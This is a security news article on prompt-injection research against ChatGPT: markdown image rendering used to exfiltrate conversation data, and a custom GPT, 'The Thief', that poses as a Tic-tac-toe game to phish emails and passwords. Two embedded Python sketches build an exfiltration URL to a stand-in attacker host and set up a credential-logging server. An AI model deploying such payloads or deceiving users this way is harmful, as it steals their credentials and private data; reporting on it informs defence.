Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server.
Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images.
They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user's conversation with ChatGPT by getting the victim to paste apparently harmless but malicious content from the attacker's website.
The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code.
In both cases, the markdown image processed by the chatbot - which can be an invisible single-pixel image - is hosted on the attacker's site.
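The injected markdown is trivial to construct: all the attacker needs is an image URL whose query string carries the stolen text, since rendering the image triggers a request to the attacker's server. A minimal sketch in Python (the domain, path and parameter name are hypothetical, not from the research):

```python
# Hypothetical sketch: how exfiltrated text can ride in a markdown image URL.
from urllib.parse import quote

ATTACKER_HOST = "https://attacker.example"  # hypothetical attacker domain


def build_payload(secret: str) -> str:
    # URL-encode the stolen text and embed it in an image reference;
    # when the chatbot renders this markdown, the image fetch delivers
    # `secret` to the attacker's server logs.
    return f"![]({ATTACKER_HOST}/pixel.png?d={quote(secret)})"


print(build_payload("user's private conversation"))
```

Because the image can be a single transparent pixel, nothing visible alerts the victim that data has left the conversation.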
ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing.
Rehberger said similar issues were found in other chatbots, including Bing Chat, Google's Bard and Anthropic's Claude, whose developers released fixes.
The researcher noticed this week that OpenAI has also started taking action to tackle the attack method.
The mitigations have apparently only been applied to the web application - the attack still works on mobile apps - and they don't completely prevent attacks.
On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. In November, OpenAI announced that ChatGPT Plus and Enterprise users would be allowed to create their own GPTs, customized for specific tasks or topics.
Rehberger created a GPT named 'The Thief' that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim's knowledge.
This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a 'personalized experience' and the user's password as part of a 'security process'.
The provided information is then sent to the attacker's server.
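On the attacker's side, collecting the exfiltrated credentials requires nothing more than an HTTP endpoint that logs incoming query strings. A hypothetical sketch using Python's standard library (the path and parameter names are illustrative assumptions, not details from the research):

```python
# Hypothetical sketch of an attacker-side collection endpoint.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs


class CollectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Parse whatever the malicious GPT smuggled into the query string,
        # e.g. /collect?email=...&password=...
        captured = parse_qs(urlparse(self.path).query)
        print("captured:", captured)
        # Respond 200 so nothing looks broken on the victim's side.
        self.send_response(200)
        self.end_headers()


# To run: HTTPServer(("", 8000), CollectHandler).serve_forever()
```

From the victim's perspective the exchange looks like an ordinary game setup flow; the exfiltration happens silently in the background.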
The researcher also showed how an attacker may be able to publish such a malicious GPT on the official GPT Store. While OpenAI has implemented a review system, it appears to block only GPTs that are obviously malicious.
SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds.


This Cyber News was published on www.securityweek.com. Publication date: Fri, 22 Dec 2023 11:13:05 +0000

